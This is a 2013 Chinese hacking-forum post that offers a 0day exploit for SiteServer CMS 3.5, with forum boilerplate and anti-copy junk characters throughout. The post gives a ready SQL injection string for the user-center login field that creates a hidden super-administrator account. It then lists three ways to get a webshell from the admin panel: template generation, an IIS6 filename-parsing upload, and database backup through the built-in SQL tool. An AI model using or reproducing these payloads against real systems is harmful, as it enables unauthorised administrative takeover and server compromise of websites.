找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2261|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版0 m2 r8 i3 e9 V5 N; d, U' s! W& ?

  W7 @, `+ n1 a2 ~. E: C0 n, }! q  Jstieserver官网:www.siteserver.cn
7 w( L/ h5 V& }. p- u- Q% k1 s; F
/ B* Q3 K. N# {1 u* j$ P , h1 V6 J- h" _; x) n- K- y

) b) J" s- A; I5 p+ H- z3 rEXP:
3 B- n4 U$ H7 ^4 f0 h. L4 C1 E( u- S
7 ^5 c, e1 c2 Q直接访问UserCenter/login.aspx+ `1 |$ p& ^+ s! n; d! v. `

. j8 K- P8 F: M* s % ^! V7 v; G% O& c) B4 k
* n, W9 C' `* {' B$ A: z& K
用户名处输入:* j1 C% f1 i5 t8 a

  N% k' d! P- \" N0 |- \123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 W+ h/ r8 O3 E* o+ I. ^
  l4 E& g; P- k. ]: k / \; P# @9 W) X& O: y

7 {2 |% |! ~  l8 o2 ?! w密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
9 o& |3 f$ A* G# M6 u
$ G% R9 t- ~& U  V: \6 r2 C, g
8 h+ E( t: v6 b. A& l! W8 z
  F+ ^* L$ Z0 S之后再访问后台SiteServer/login.aspx用插入的用户登陆' I" {8 m6 E3 n3 p

- ^6 y+ f, d9 k" h1 T) ^
/ f  \6 J: w# x& w& ?# q, X8 ]  H1 C+ f0 O* C; u5 ?
后台拿webshell的三种方法:
+ S0 V4 R2 K  S/ s) p
& q; ~: A' f2 y  Y2 {  h一、5 _0 L' \( k7 h& e9 H% @- R& M% E
; Y- S, Q$ T7 ?, J
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! {4 ]# W- h! b% h7 _* y
* u# Z1 N3 o- P. W  @+ K3 r6 k二、
6 M. W5 ], Z$ q% B+ D! x# M; C0 L' x
成员权限-》添加用户-》用户名为:1.asp9 D9 t5 X2 m5 z
; @: y  x6 i- ]& ^! k6 r8 _9 e0 a
http://127.0.0.1/usercenter/
' j- a7 u" w# c* W3 X) ~' D5 o) y4 t% Y* B% P3 G; C( U* S$ ^
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" n- u/ i( t  P* n0 U8 b* @# l( Z$ k, K8 O" N6 j$ P2 z
(ps:后台添加用户时不会验证是否含有非法字符)
( G- I% E9 Z% Y; @& I5 H
" V0 q9 a  a. u/ @三、
- S# u6 H" v2 ^% [$ h0 l6 h, b: b+ B( \" D4 V0 _; u- F
系统工具-》实用工具-》机器参数查看! T* y9 S- b% s5 }: K, X& Q1 U" M4 l
可以看到数据库类型、名称,WEB路径. C* g+ u9 N- s* K2 {) @
8 W7 Z$ X# }) [" v: S
系统工具-》数据库工具-》SQL语句查询
' H% s! Q! i( D# g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
; K' S" P8 ~* J. v( |; p- [1 R/ r8 x+ G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表